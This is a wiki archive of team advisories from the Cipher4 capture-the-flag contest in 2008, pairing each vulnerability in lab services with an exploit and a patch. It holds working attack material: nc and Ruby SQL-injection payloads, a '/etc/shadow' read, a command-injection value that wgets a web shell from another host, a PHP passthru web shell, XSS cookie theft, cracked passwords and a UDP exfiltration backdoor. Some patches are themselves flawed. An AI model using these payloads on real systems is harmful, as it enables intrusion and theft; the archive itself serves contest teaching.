Advisories Cipher4

Aus Labor für Echtzeitsysteme

Wechseln zu: Navigation, Suche
********************* Advisory 1, Flux Fingers on (General Fault)
 
Scored: 1
Submitted: 18:19:45 1.8.2008
Published: 18:49:45 1.8.2008
 
Judge Lexi said: hm
 
Advisory
Serveral Users in /etc/shadow have weak passwords. Cracking time using John The Ripper was about 5 seconds.
 
Password (Username)
123456 (brook3)
foobar (5kr3wdr1v3r)
sex (gabble)
 
 
Exploit
Login using the User with ssh.
 
Patch
Edit /etc/ssh/sshd_config and add a line "AllowUsers root" and
/etc/init.d/ssh restart
the sshd.
 
********************* Advisory 3, Defender of the Flag on ghoSTFTP
 
Scored: 1
Submitted: 18:28:24 1.8.2008
Published: 18:58:24 1.8.2008
 
Judge Lexi said: ok
 
Advisory
Attackers can remotely mount NFS /home/ghoSTFTP and /tmp. This enables to read all files in that /home/ghoSTFTP. Moreover, one can read/write all files in /tmp.
 
Exploit
Execute the following command:
 
mount somehost:/home/ghoSTFTP /mnt/
 
Patch
Edit /etc/exports and remove the following lines:
 
/home/ghoSTFTP 10.0.0.0/255.0.0.0(ro,no_root_squash)
/tmp 10.0.0.0/255.0.0.0(rw,root_squash)
 
 
********************* Advisory 4, teamSparta on (General Fault)
 
Scored: 1
Submitted: 18:37:53 1.8.2008
Published: 19:07:53 1.8.2008
 
Judge tilo said: k
 
Advisory
mysqld per default listens on all interfaces, should be bound to localhost so you cannot just get the other's flags because passwd's are globally shared. :)
 
Exploit
mysql -h 10.1.x.3 -u [...]
 
Patch
bind_addr = 127.0.0.1 in /etc/mysql/my.cnf
 
********************* Advisory 5, Defender of the Flag on myspray
 
Scored: 1
Submitted: 18:37:59 1.8.2008
Published: 19:07:59 1.8.2008
 
Judge tilo said: ok
 
Advisory
MySpray is a Studi-VZ-like page to share your personal data to your buddies.
People can register and set up personal profiles.
 
 
The admin interface is accessable via url /myspray/admin.html from the front page or by just typing the link into the address bar without authentication.
 
Exploit
Enter the admin area and delete the database via web interface or login as any user.
 
Patch
As a initial response rename /myspray/templates/admin.html to a secret filename hard to guess. (Alternatively you can change the linux rights for this file: chmod 000 templates/admin.html). Later you can delete the url entry from the file urls.py in the root directory of the application and update the urls.pyc file.
 
********************* Advisory 6, Defender of the Flag on myspray
 
Scored: 1
Submitted: 18:38:41 1.8.2008
Published: 19:08:41 1.8.2008
 
Judge tilo said: .
 
Advisory
Advisory myspray:
1. Background
On the server there is a mysql database running. Which has a default
insecure configuration and additionally a insecure user.
2. Description
The problem is, that mysql is listening on any IP Adress (*).
In the mysql database there exist a
user named: "myspray" with a default password.
 
 
Exploit
You can connect to the mysql database from any IP adress via
mysql -u myspray -p 10.1.30.3
 
Patch
1. You could configure mysql that it is only listening to local requests
OR
2. You could delete the user myspray
OR
3. You could edit the User, that he can only connect locally
 
********************* Advisory 11, The Electronic Mayhem on rapid graffiti
 
Scored: 1
Submitted: 18:50:02 1.8.2008
Published: 19:20:02 1.8.2008
 
Judge tilo said: ok
 
Advisory
Its possible to login as admin without password. This allows to erase information from the system and to view all the hosted images.
 
Exploit
Surf to http://host/rapid/radmin. When prompted for login use login "admin" and leave the password field empty.
 
Patch
Run the following command:
 
htpasswd -c /home/rapid/radmin/.admin admin
 
********************* Advisory 17, Squareroots on (General Fault)
 
Scored: 1
Submitted: 18:53:32 1.8.2008
Published: 19:23:32 1.8.2008
 
Judge Lexi said: ok
 
Advisory
======================================================================
---__----__-----------__---)__----__---)__----__----__--_/_---__-
(_ ` / ) / / / ) / ) /___) / ) / ) / ) / (_ `
_(__)_(___/_(___(__(___(_/_____(___ _/_____(___/_(___/_(_ __(__)_
/
(_ squareroots @ cipher4
 
- missing restrictions in /home -
 
======================================================================
Table of Contents
 
Affected Service ....................................................1
Severity.............................................................2
Description of Vulnerability.........................................3
Exploit / PoC........................................................4
Solution.............................................................5
Time Table...........................................................6
 
======================================================================
1) Affected Service
 
All; Configuration Fault
 
======================================================================
2) Severity
 
Rating: Critical
 
======================================================================
3) Description of Vulnerability
 
User /home directory permissions are too relaxed, this can be used
to compromise other user directories.
 
======================================================================
4) Exploit / PoC
 
drwxr-xr-x 10 ghoSTFTP ghoSTFTP 4.0K Jul 11 06:56 .
drwxr-xr-x 21 root root 32K Jul 28 10:28 ..
drwxr-xr-x 4 5kr3wdr1v3r 5kr3wdr1v3r 4.0K Jul 20 03:41 5kr3wdr1v3r
drwxr-xr-x 2 brook3 brook3 4.0K Jul 19 05:44 brook3
drwxr-xr-x 3 gabble gabble 4.0K Aug 1 06:49 gabble
drwxr-xr-x 2 ghoSTFTP ghoSTFTP 4.0K Jul 28 10:39 ghoSTFTP
drwxrwxr-x 5 myspray www-data 4.0K Jul 28 08:53 myspray
drwxr-xr-x 3 r00t r00t 4.0K Jul 18 09:07 r00t
drwxrwxr-x 9 rapid www-data 4.0K Aug 1 06:48 rapid
drwxr-xr-x 2 tagging tagging 12K Aug 1 06:48 tagging
 
======================================================================
5) Solution
 
Limit user permissions to needed directories only.
i.e.: chmod o-rx <directory>
 
======================================================================
6) Time Table (time is GMT +2)
 
18:05 - discovery
18:13 - fixed
18:50 - disclosure
 
======================================================================
 
 
Exploit
 
 
Patch
chmod o-rx <directory>
 
********************* Advisory 18, SYPER on (General Fault)
 
Scored: 1
Submitted: 18:54:32 1.8.2008
Published: 19:24:32 1.8.2008
 
Judge Lexi said: ok
 
Advisory
Mysql root with no password set.
 
Exploit
just use mysql client
 
Patch
set password for root@localhost , ex: mysqladmin
 
********************* Advisory 19, The Electronic Mayhem on (General Fault)
 
Scored: 1
Submitted: 18:55:03 1.8.2008
Published: 1:00:00 1.1.1970
 
Judge tilo said:
 
Advisory
Http servers runs on port 80 and gives a directory listing. This allows attackers to read arbitrary files.
 
Exploit
In a web browser, connect to the vulnerable host on port 80.
 
http://vulnerable
 
Navigate to media/members to retrieve files within that directory.
 
 
 
Patch
- In the apache config files, added Options -Indexes everywhere
- In /etc/apache2/sites-enabled/myspray, for VirtualHost *:80, changed the DocumentRoot to /var/www
 
********************* Advisory 22, The Electronic Mayhem on (General Fault)
 
Scored: 1
Submitted: 18:57:08 1.8.2008
Published: 19:27:08 1.8.2008
 
Judge Lexi said: ok
 
Advisory
It's possible to login remotely to mysql with the default debian password. This gives full control over the database.
 
Exploit
Login via mysql to remote host with the following username/password.
 
user= debian-sys-maint
password = n0eivtjU1w9ieUEw
 
Patch
Change the password. Execute the following command:
 
mysqladmin -u root password NEWPASSWORD
 
Change the debian system maintainer password in the same way.
 
 
 
 
 
 
********************* Advisory 25, The Electronic Mayhem on rapid graffiti
 
Scored: 1
Submitted: 19:03:01 1.8.2008
Published: 19:33:01 1.8.2008
 
Judge tilo said: ok
 
Advisory
Surfing to http://host/rapid/files/ allows attackers to see all files.
 
Exploit
Surfing to http://host/rapid/files/. Download all files.
 
Patch
Edit /home/rapid/files/.htaccess
 
Replace the second line to
 
Options -Indexes
 
 
 
********************* Advisory 26, Squareroots on (General Fault)
 
Scored: 1
Submitted: 19:03:19 1.8.2008
Published: 19:33:19 1.8.2008
 
Judge tilo said: okay
 
Advisory
======================================================================
---__----__-----------__---)__----__---)__----__----__--_/_---__-
(_ ` / ) / / / ) / ) /___) / ) / ) / ) / (_ `
_(__)_(___/_(___(__(___(_/_____(___ _/_____(___/_(___/_(_ __(__)_
/
(_ squareroots @ cipher4
 
- missing restrictions in /home -
 
======================================================================
Table of Contents
 
Affected Service ....................................................1
Severity.............................................................2
Description of Vulnerability.........................................3
Exploit / PoC........................................................4
Solution.............................................................5
Time Table...........................................................6
 
======================================================================
1) Affected Service
 
All; Configuration Fault
 
======================================================================
2) Severity
 
Rating: Critical
 
======================================================================
3) Description of Vulnerability
 
User /home directory permissions are too relaxed, this can be used
to compromise other user directories.
 
======================================================================
4) Exploit / PoC
 
drwxr-xr-x 10 ghoSTFTP ghoSTFTP 4.0K Jul 11 06:56 .
drwxr-xr-x 21 root root 32K Jul 28 10:28 ..
drwxr-xr-x 4 5kr3wdr1v3r 5kr3wdr1v3r 4.0K Jul 20 03:41 5kr3wdr1v3r
drwxr-xr-x 2 brook3 brook3 4.0K Jul 19 05:44 brook3
drwxr-xr-x 3 gabble gabble 4.0K Aug 1 06:49 gabble
drwxr-xr-x 2 ghoSTFTP ghoSTFTP 4.0K Jul 28 10:39 ghoSTFTP
drwxrwxr-x 5 myspray www-data 4.0K Jul 28 08:53 myspray
drwxr-xr-x 3 r00t r00t 4.0K Jul 18 09:07 r00t
drwxrwxr-x 9 rapid www-data 4.0K Aug 1 06:48 rapid
drwxr-xr-x 2 tagging tagging 12K Aug 1 06:48 tagging
 
ls /home/thisisnotmyhome
cat /home/thisisnotmyhome/thisisnotmydata
 
======================================================================
5) Solution
 
Limit user permissions to needed directories only.
i.e.: chmod o-rx <directory>
 
======================================================================
6) Time Table (time is GMT +2)
 
18:05 - discovery
18:13 - fixed
18:50 - disclosure
 
======================================================================
 
 
Exploit
ls /home/thisisnotmyhome/
cat /home/thisisnotmyhome/thisisnotmydata
 
 
Patch
chmod o-rx <directory>
 
********************* Advisory 27, in23canation on myspray
 
Scored: 1
Submitted: 19:04:03 1.8.2008
Published: 1:00:00 1.1.1970
 
Judge tilo said:
 
Advisory
Directory Listing is enabled in myspray.
 
 
Exploit
navigate to http://10.1.xx.3/
 
Patch
Create a File index.html in /home/myspray
 
********************* Advisory 29, Wizards of DoS on gabble
 
Scored: 3
Submitted: 19:09:36 1.8.2008
Published: 1:00:00 1.1.1970
 
Judge tilo said: Somebody told me the exploit is not working. Well, too late now. You keep the points.
 
Advisory
gabbled is vulnerable to SQLinjection on various places.
 
e.g. in authUser() the ...user='%s'... in formatstring
 
Exploit
#!/usr/bin/env ruby
 
require 'socket'
require 'net/http'
require 'net/https'
require 'net/ftp'
 
 
def exploit(ip)
begin
shellcode="\\x02\\0x00zeri';SELECT * FROM offlinemessages;--\\0x001337\\0x00"
s=TCPSocket.new(ip,4000)
s.send shellcode
while true do
puts s.gets
end
rescue StandartError => crash
 
end
end
#iterate throu
for i in (1..32) do
Thread.new do
exploit("10.0.#{i}.3")
end
end
 
sleep 100
 
 
Patch
implement SQLstatement filter : )
 
********************* Advisory 31, Squareroots on rapid graffiti
 
Scored: 2
Submitted: 19:11:59 1.8.2008
Published: 19:41:59 1.8.2008
 
Judge tilo said: .
 
Advisory
======================================================================
---__----__-----------__---)__----__---)__----__----__--_/_---__-
(_ ` / ) / / / ) / ) /___) / ) / ) / ) / (_ `
_(__)_(___/_(___(__(___(_/_____(___ _/_____(___/_(___/_(_ __(__)_
/
(_ squareroots @ cipher4
 
- rapid graffiti configuration -
 
======================================================================
Table of Contents
 
Affected Service ....................................................1
Severity.............................................................2
Description of Vulnerability.........................................3
Exploit / PoC........................................................4
Solution.............................................................5
Time Table...........................................................6
 
======================================================================
1) Affected Service
 
rapid graffiti on http://host/rapid/
 
======================================================================
2) Severity
 
Rating: Critical
 
======================================================================
3) Description of Vulnerability
 
/home/rapid/premium/.htaccess contains a <Files *.*> directive.
This only limits access to files containing a dot;
the file "users" still is accessible.
 
======================================================================
4) Exploit / PoC
 
Access http://host/rapid/premium/users
 
======================================================================
5) Solution
 
In .htaccess:
Change <Files *.*> to <Files *>
 
======================================================================
6) Time Table (time is GMT +2)
 
18:45 - discovery
18:50 - fixed
19:05 - disclosure
 
======================================================================
 
 
Exploit
Access http://host/rapid/premium/users
 
Patch
In .htaccess:
Change <Files *.*> to <Files *>
 
********************* Advisory 36, Chocolate Makers on gabble
 
Scored: 3
Submitted: 19:20:42 1.8.2008
Published: 19:50:42 1.8.2008
 
Judge tilo said: yes
 
Advisory
sql injection in several functions in database.c
 
Exploit
(echo -en "\\x02ciao\\x00ciao ' delete from gabble ; cat) | nc TARGET 4000
 
Patch
at the beginning of database.c:
 
#define sprintf(x, ...) \\
{ \\
int i; \\
snprintf(x, sizeof(x) - 1, __VA_ARGS__); \\
for (i = 0; i < sizeof(x); i++) { \\
if (x[i] == '\\'') \\
x[i] = '-'; \\
} \\
}
 
 
********************* Advisory 38, Defender of the Flag on rapid graffiti
 
Scored: 3
Submitted: 19:21:30 1.8.2008
Published: 19:51:30 1.8.2008
 
Judge tilo said: correct
 
Advisory
rapid graffiti is a website with a upload function for pictures files.
On this website there you can register a new user with
rapid/ssl/sign.php". The problem is that in this file exist two variables: "un" and "pw" which are handed over to a
 
exec("htpasswd -mb ../premium/users ".$_REQUEST['un']." ".$_REQUEST['pw']);
 
in line 45.
 
Exploit
On ../rapid/ssl.sign.php in the GET Variable "un" you can hand over shell commands like:
 
UN: "DotF ; wget 10.1.30.5/shell.php"
 
You can than open the shell.php via 10.1.x.3/rapid/shell.php
 
Patch
Filter Shell commands out of GET Variable un and pw via:
$_REQUEST['un'] = escapeshellcmd($_REQUEST['un']);
$_REQUEST['pw'] = escapeshellcmd($_REQUEST['pw']);
 
before line 45
 
********************* Advisory 39, h4ck!nb3rg on gabble
 
Scored: 2
Submitted: 19:25:37 1.8.2008
Published: 19:55:37 1.8.2008
 
Judge tilo said: no exploit
 
Advisory
Format String vulnuability in gabbled.c on line 282.
 
(sendPacket(client_fd,"%c%s\\xFF",52,"user authenticated")) {
 
printf(user); printf(" authenticated\
");
 
return 1;
 
}
 
If user supplied input in the variable 'user' contains format strings like %x, %s, ... it would be possible to examine stack memory, reading/writing from arbitrary memory address.
 
Exploit
 
 
Patch
through using sprintf _correctly_ with one than more paramaters this vulnerability can be fixed.
 
if (sendPacket(client_fd,"%c%s\\xFF",52,"user authenticated")) {
 
sprintf("%s",user); printf(" authenticated\
");
 
return 1;
 
}
 
********************* Advisory 40, Chocolate Makers on ghoSTFTP
 
Scored: 3
Submitted: 19:25:43 1.8.2008
Published: 19:55:43 1.8.2008
 
Judge tilo said: finally
 
Advisory
The service ghoSTFTP serves as a simple file tranfer protocol over udp.
The service runs with root privileges and, as long as it doesn't do
any authentication, It's possible to read and write any file in the
file system.
 
Exploit
(perl -e 'print "\\x01/etc/shadow\\x00"' ; cat) | nc -u vuln 1025
 
Patch
change the start script to drop the privileges to user 1005 (ghoSTFTPd)
 
diff -u ghoSTFTPd.orig ghoSTFTPd
--- ghoSTFTPd.orig 2008-07-29 23:17:46.000000000 -1000
+++ ghoSTFTPd 2008-08-01 07:23:44.000000000 -1000
@@ -48,9 +48,9 @@
# 0 if daemon has been started
# 1 if daemon was already running
# 2 if daemon could not be started
- start-stop-daemon --start -c 0:0 -d $BASEDIR --quiet --pidfile $PIDFILE --exec $DAEMON --test > /dev/null \\
+ start-stop-daemon --start -c 1005:1005 -d $BASEDIR --quiet --pidfile $PIDFILE --exec $DAEMON --test > /dev/null \\
|| return 1
- start-stop-daemon --start -c 0:0 -d $BASEDIR --quiet --pidfile $PIDFILE --exec $DAEMON -- \\
+ start-stop-daemon --start -c 1005:1005 -d $BASEDIR --quiet --pidfile $PIDFILE --exec $DAEMON -- \\
$DAEMON_ARGS \\
|| return 2
}
 
 
********************* Advisory 41, teamSparta on (General Fault)
 
Scored: 4
Submitted: 19:30:26 1.8.2008
Published: 20:00:26 1.8.2008
 
Judge tilo said: very nice
 
Advisory
ld.so.preload contains /lib/libradio.so which overwrites read(..) to scan for 11.xx.xx.xx and sends a UDP packet to 10.x.x.x:31337 containing the whole read buffer.
 
This is the ub0r backd00r, so kindly respect our advisory policy by delaying this for a little longer... ;)
 
Exploit
Inject the string 11.1.x.x in various interesting places and have flags sent to you via UDP.
 
Patch
Clear /etc/ld.so.preload.
 
********************* Advisory 42, h4ck!nb3rg on myspray
 
Scored: 2
Submitted: 19:31:52 1.8.2008
Published: 20:01:52 1.8.2008
 
Judge tilo said: all right, but you won't get any flags with this "exploit"
 
Advisory
myspray application is a portal similar to studivz. the myspary application login is prone to xss attacks due to a lack of user input validation. that can be used to steal user credentials if a user clicks on a specialy crafted link
 
Exploit
type the following into the login field:
"<script>alert(1)</script>
 
Patch
use the python htmlspecialchars to sanitize the input before sending it back to the browser.
 
********************* Advisory 44, Squareroots on myspray
 
Scored: 4
Submitted: 19:36:08 1.8.2008
Published: 20:06:08 1.8.2008
 
Judge tilo said: nice
 
Advisory
======================================================================
---__----__-----------__---)__----__---)__----__----__--_/_---__-
(_ ` / ) / / / ) / ) /___) / ) / ) / ) / (_ `
_(__)_(___/_(___(__(___(_/_____(___ _/_____(___/_(___/_(_ __(__)_
/ (_
squareroots @ cipher4
 
- MySpray SQL Injection -
 
======================================================================
Table of Contents
 
Affected Service ....................................................1
Severity.............................................................2
Description of Vulnerability.........................................3
Exploit / PoC........................................................4
Solution.............................................................5
Time Table...........................................................6
 
======================================================================
1) Affected Service
 
MySpray as a HTTP Service on URL http://host/myspray/
 
======================================================================
2) Severity
 
Rating: Highly critical
Impact: Webapp access
Where : remote
 
======================================================================
3) Description of Vulnerability
 
SQL-Injection to login without valid password.
It's possible via the username parameter using a query like
'; SELECT * FROM community_member //
 
The responsible code is the function "login", where no input validation is done:
query = "SELECT * FROM community_member WHERE email = '%s' AND password = '%s';" %
(post['email'],md5.new(post['password']).hexdigest())
 
======================================================================
4) Exploit / PoC
 
Login using the query '; SELECT * FROM community_member //
 
======================================================================
5) Solution
 
Do some input validation like:
 
query = "SELECT * FROM community_member WHERE email = '%s' AND password = '%s';" %
(MySQLdb.escape_string(post['email']),md5.new(post['password']).hexdigest())
 
======================================================================
6) Time Table (time is GMT +2)
 
19:00 - discovery
19:15 - fixed
19:40 - disclosure
 
======================================================================
 
Exploit
Login using the query '; SELECT * FROM community_member //
 
Patch
 
Do some input validation like:
 
query = "SELECT * FROM community_member WHERE email = '%s' AND password = '%s';" %
(MySQLdb.escape_string(post['email']),md5.new(post['password']).hexdigest())
 
 
********************* Advisory 46, h4ck!nb3rg on gabble
 
Scored: 2
Submitted: 19:38:32 1.8.2008
Published: 20:08:32 1.8.2008
 
Judge tilo said: missing exploit
 
Advisory
on line 324 on gabbled.c the function printf could be used for format string vulnuability.
 
(sendPacket(client_fd,"%c%s\\xFF",53,"user removed")) {
 
printf(user); printf(" removed\
");
 
return 1;
 
}
 
trough input %s,%x, ... the user could read/write to arbitrary memory addresses.
 
Exploit
 
 
Patch
through using the function sprintf _correctly_ with zwo parameteters you could fix this bug.
 
(sendPacket(client_fd,"%c%s\\xFF",53,"user removed")) {
 
sprintf("%s",user); printf(" removed\
");
 
return 1;
 
}
 
********************* Advisory 47, HackerDom on rapid graffiti
 
Scored: 3
Submitted: 19:38:48 1.8.2008
Published: 20:08:48 1.8.2008
 
Judge tilo said: yes
 
Advisory
In file upload.php variable $id is not sanitazied properly.
$id=$_REQUEST['i'];
 
Due to this it is able to create dir & upload file at any directory you have rights to write. For example: /tmp
 
Exploit
change field ID to something you want
 
Patch
$id=intval($_REQUEST['i']);
 
********************* Advisory 54, h4ck!nb3rg on myspray
 
Scored: 3
Submitted: 19:55:26 1.8.2008
Published: 20:25:26 1.8.2008
 
Judge tilo said: yes
 
Advisory
the myspray app is similar to studivz. the application is prone to xss attacks when leaving a message to users. if the message is read by an admin, it is possible to steal his cookie and then take over control of the app.
 
Exploit
to exploit, post the following message to a user:
<script>alert(document.cookie)</script>
instead of altering the cookie it can be sent to an attacker using an image tag or similar.
 
 
Patch
patch the templates/profile.html file to use the python function htmlspecialchars(). thats all ;-)
 
********************* Advisory 55, HackerDom on rapid graffiti
 
Scored: 2
Submitted: 20:00:09 1.8.2008
Published: 20:30:09 1.8.2008
 
Judge tilo said: yes, nice patch, but boring exploit ;-)
 
Advisory
This web server execute php files.
upload.php is allow upload file with any extension. So, it's possible upload PHP file and then execute it.
 
 
Exploit
upload file 1.php.
cat 1.php
<?php phpinfo() ?>
 
Patch
Do not upload .php files.
 
$filepath="files/".$id."/";
$filename=$_FILES['f']['name'];
$filesize=$_FILES['f']['size'];
 
if (preg_match('/\\.php$/i', $filename)){
echo "PHP is not allowed for uploading<br>";
exit;
}
 
$filetmp =$_FILES['f']['tmp_name'];
 
 
 
********************* Advisory 56, The Electronic Mayhem on rapid graffiti
 
Scored: 2
Submitted: 20:03:05 1.8.2008
Published: 20:33:05 1.8.2008
 
Judge tilo said: ok
 
Advisory
Shell injection possible via rapid graffiti. Allows execution of arbitrary shell commands.
 
Exploit
In line 42 of sign.php, attackers a shell command is executed which contains user input. However, this input is not properly sanitized.
 
exec("htpasswd -mb ../premium/users ".$_REQUEST['un']." ".$_REQUEST['pw']);
 
Sending a malicous request where the request variable request pw variable equals "; command" allows execution the "command".
 
 
Patch
Edit line 42 in sign.php:
 
exec(escapeshellcmd "htpasswd -mb ../premium/users ".$_REQUEST['un']." ".$_REQUEST['pw']));
 
 
********************* Advisory 57, The RPIsec knurd machine on rapid graffiti
 
Scored: 2
Submitted: 20:05:47 1.8.2008
Published: 1:00:00 1.1.1970
 
Judge tilo said: ok
 
Advisory
You can use upload.php to upload php scripts.
 
Exploit
Go to upload.php, upload a file named test.php containing the following code:
<?
phpinfo();
 ?>
 
When the file is uploaded, click the link to view it and you'll see that the code was executed.
 
Patch
Make sure the uploaded file has an extension of an image such as .jpeg, .jpg, and .gif.
 
$len = count($filename);
if (strrpos($filename, ".jpeg") !=$len-5 && strrpos($filename, ".jpg") != $len-4 && strrpos($filename, ".gif" != $len-4) die("Bad file");
 
********************* Advisory 60, ENOFLAG on gabble
 
Scored: 3
Submitted: 20:08:43 1.8.2008
Published: 20:38:43 1.8.2008
 
Judge tilo said: correct patch, but the exploit....
 
Advisory
Format string vulnerability in dbSetPasswort (gabble):
int dbSetPassword(char* user, char* password) {
char query[QUERYLEN];
char usr[] = "_________UNKNOWN_________";
 
if (user && password)
sprintf(usr,user);
 
 
Exploit
set password %x %x
 
Patch
if (user && password)
sprintf(usr,"%s", user);
 
********************* Advisory 62, The RPIsec knurd machine on ghoSTFTP
 
Scored: 3
Submitted: 20:10:19 1.8.2008
Published: 20:40:19 1.8.2008
 
Judge tilo said: Nice. Well, no real exploit or something is given, but PostScript is hard enough to read.
 
Advisory
ghoSTFTPd executes PostScript files it receives. While Ghostscript correctly executes with the SAFER option, it is still possible to write a PostScript file that performs a series of commands and outputs to a file, which can be read by the attacker.
 
 
Exploit
 
 
Patch
Remove the following line from ghoSTFTPd.ps:
 
filename ps
 
********************* Advisory 64, HPAC08 on rapid graffiti
 
Scored: 3
Submitted: 20:18:51 1.8.2008
Published: 20:48:51 1.8.2008
 
Judge tilo said: yes
 
Advisory
The forgot-password function is vulnerable to sql injection:
Neither the submitted username nor the answer to the question are escaped using mysql_real_escape_string.
To make it easier, a list of all registered user is available, to.
 
Exploit
Read a username from the https://$server/rapid/ssl/login.php. Go to https://$server/rapid/ssl/forgot.php and put the following SQL code into the username box:
 
' UNION SELECT answer FROM pw WHERE usr='$username' limit 1 UNION select usr from pw where usr='
 
Then you see the answer to the question and can generate a new password to log in.
 
Patch
diff -u forgot_vul.php forgot.php
--- forgot_vul.php 2008-08-01 08:23:43.000000000 -1000
+++ forgot.php 2008-08-01 08:12:23.000000000 -1000
@@ -38,7 +38,7 @@
<?php
if (isset($_REQUEST['n'])) {
$user=$_REQUEST['n'];
- $result=mysql_query("SELECT question FROM pw WHERE usr='".$user."'");
+ $result=mysql_query("SELECT question FROM pw WHERE usr='".mysql_real_escape_string($user)."'");
if ($row=mysql_fetch_object($result)) {
echo "<br><form name='answer' method='post' action='forgot.php'>";
echo "<table><tbody>";
@@ -58,7 +58,7 @@
elseif (isset($_REQUEST['u']) && isset($_REQUEST['a'])) {
$user=$_REQUEST['u'];
$answer=$_REQUEST['a'];
- $result=mysql_query("SELECT answer FROM pw WHERE usr='".$user."'");
+ $result=mysql_query("SELECT answer FROM pw WHERE usr='".mysql_real_escape_string($user)."'");
if ($row=mysql_fetch_object($result)) {
if ($row->answer==$answer) {
$newpassword=rand(100000,999999);
 
 
********************* Advisory 66, Scythian on myspray
 
Scored: 2
Submitted: 20:23:34 1.8.2008
Published: 20:53:34 1.8.2008
 
Judge tilo said: .
 
Advisory
The Django administration application will, when accessed by a user
who is not sufficiently authenticated, display a login form and ask
the user to provide the necessary credentials before displaying the
requested page. This form will be submitted to the URL the user
attempted to access, by supplying the current request path as the
value of the form's "action" attribute.
 
The value of the request path was not being escaped, creating an
opportunity for a cross-site scripting (XSS) attack by leading a user
to a URL which contained URL-encoded HTML and/or JavaScript in the
request path.
 
Exploit
While registration write this string in first name field:
 
<script> alert('test')</script>
 
This string shows that there is sql injection in code.
 
Patch
django/branches/0.96-bugfixes/django/contrib/admin/views/decorators.py
before
'app_path': request.path,
after
'app_path': escape(request.path),
 
 
********************* Advisory 67, h4ck!nb3rg on myspray
 
Scored: 2
Submitted: 20:31:10 1.8.2008
Published: 21:01:10 1.8.2008
 
Judge tilo said: .
 
Advisory
the myspray application is similar to studivz. due to a sql injection vulnerability it is possible to send arbitrary commands to the database interface. the vulnerable file resides is "editmypage.html" the vulnerable parameter is "gender" which is pretty much obscured because it is a dropdown field ;-)
 
Exploit
produce a simple error by entering the following code into the parameter:
bla' or 1=1; --
that results ins "data truncated from column 'gender' at row 1"
 
that already produces a strack trace - insert other statements to read or alter data (for example with 25parameters for community_member ;-)
 
Patch
use the escape_string function in views.py
 
********************* Advisory 69, in23canation on myspray
 
Scored: 1
Submitted: 20:46:54 1.8.2008
Published: 1:00:00 1.1.1970
 
Judge tilo said: hmm. okay, but score for that would be 0.25 :-)
 
Advisory
Information Disclosure
DEBUG is enabled by default in DJANGO
 
Exploit
navigate to
http://10.1.xx.3/myspray/bla.html
 
 
Patch
Open settings.py and change DEFAULT=True to DEFAULT=False
 
********************* Advisory 74, h4ck!nb3rg on myspray
 
Scored: 3
Submitted: 21:01:07 1.8.2008
Published: 21:31:07 1.8.2008
 
Judge tilo said: jepp
 
Advisory
the myspray app is similar to studivz. the service allowed upload of php files for authenticated users. that can be done under the mygraffiti.html
 
Exploit
upload a file like this:
<?php
passthru($_GET['cmd']);
 ?>
 
then issue commands: ;-) for example:
rop1.php?cmd=whoami
 
results in:
www-data
 
 
Patch
disable upload of php-files in upload.html. for example disable upload of certain file extensions and disable execution of files in the folder where files are uploaded.
 
********************* Advisory 75, Squareroots on myspray
 
Scored: 1
Submitted: 21:01:51 1.8.2008
Published: 21:31:51 1.8.2008
 
Judge tilo said: you are not the first one. but your patch was more detailled. so you will get one point anyhow.
 
Advisory
======================================================================
---__----__-----------__---)__----__---)__----__----__--_/_---__-
(_ ` / ) / / / ) / ) /___) / ) / ) / ) / (_ `
_(__)_(___/_(___(__(___(_/_____(___ _/_____(___/_(___/_(_ __(__)_
/
(_ squareroots @ cipher4
 
- myspray arbitrary command execution -
 
======================================================================
Table of Contents
 
Affected Service ....................................................1
Severity.............................................................2
Description of Vulnerability.........................................3
Exploit / PoC........................................................4
Solution.............................................................5
Time Table...........................................................6
 
======================================================================
1) Affected Service
 
MySpray as a HTTP Service on URL http://host/myspray/
 
======================================================================
2) Severity
 
Rating: Highly critical
Impact: System compromise
Where : remote
 
======================================================================
3) Description of Vulnerability
 
It is possible to upload php-scripts via "My Graffiti" "upload".
 
======================================================================
4) Exploit / PoC
 
If you upload a php-script and then click on the link to the "big image",
the script is executed and you can execute arbitrary system / php commands.
 
======================================================================
5) Solution
 
Add a static filename to any upload to prevent the execution through the php-interpreter:
def upload(request):
max = range(5)
if isLoggedin(request):
post = request.POST
files = request.FILES
if post and files:
for i in max:
try:
filename = files[str(i)]['filename'] + '.jpg' #
here we add a jpg to the filename!!!!
content = files[str(i)]['content']
except:
 
======================================================================
 
 
Exploit
If you upload a php-script and then click on the link to the "big image",
the script is executed and you can execute arbitrary system / php commands.
 
Patch
Add a static filename to any upload to prevent the execution through the php-interpreter:
def upload(request):
max = range(5)
if isLoggedin(request):
post = request.POST
files = request.FILES
if post and files:
for i in max:
try:
filename = files[str(i)]['filename'] + '.jpg' #
here we add a jpg to the filename!!!!
content = files[str(i)]['content']
except:
 
 
********************* Advisory 76, ENOFLAG on rapid graffiti
 
Scored: 3
Submitted: 21:02:20 1.8.2008
Published: 21:32:20 1.8.2008
 
Judge tilo said: right
 
Advisory
when a user connects the authentication and logging is based on the cookie values.
 
when a cookie names userid exists and a cookie named ip with the remote-ip of the user exists, the user is logged in automagically
 
Exploit
use your favorite browser-plugin or wget to set the cookies
 
Patch
work around: use php-sessions to store the data. autlogin will not be possible but single sign on.
 
e.g.:
 
diff -Naur rapid.prefls/ssl/sign.php rapid/ssl/sign.php
--- rapid.prefls/ssl/sign.php 2008-07-08 23:46:16.000000000 -1000
+++ rapid/ssl/sign.php 2008-08-01 08:55:04.000000000 -1000
@@ -39,7 +39,7 @@
<?php
if (isset($_REQUEST['un']) && isset($_REQUEST['pw']) && isset($_REQUEST['pw2']) && isset($_REQUEST['q']) && isset($_REQUEST['a']) && $_REQUEST['pw']==$_REQUEST['pw2'] && strlen($_REQUEST['pw'])>5 && strlen($_REQUEST['un'])>5) {
mysql_query("INSERT INTO pw (usr,pw,question,answer) VALUES ('".$_REQUEST['un']."','".md5($_REQUEST['pw'])."','".$_REQUEST['q']."','".$_REQUEST['a']."')");
exec("htpasswd -mb /home/rapid-users ".addslashes($_REQUEST['un'])." ".addslashes($_REQUEST['pw']));
echo "Hello ".$_REQUEST['un']."!<br>Your account has successfully been created.";
echo " <br><br><br>".
" <a href='login.php'>Login</a>";
diff -Naur rapid.prefls/ssl/upload.php rapid/ssl/upload.php
--- rapid.prefls/ssl/upload.php 2008-07-08 23:46:16.000000000 -1000
+++ rapid/ssl/upload.php 2008-08-01 08:54:13.000000000 -1000
@@ -1,5 +1,7 @@
<?php
- if ($_COOKIE['ip']!=$_SERVER['REMOTE_ADDR']) {
+session_start();
+
+ if ($_SESSION['ip']!=$_SERVER['REMOTE_ADDR']) {
header("Location: http://".$_SERVER['SERVER_NAME']."/rapid/error.html");
die();
}
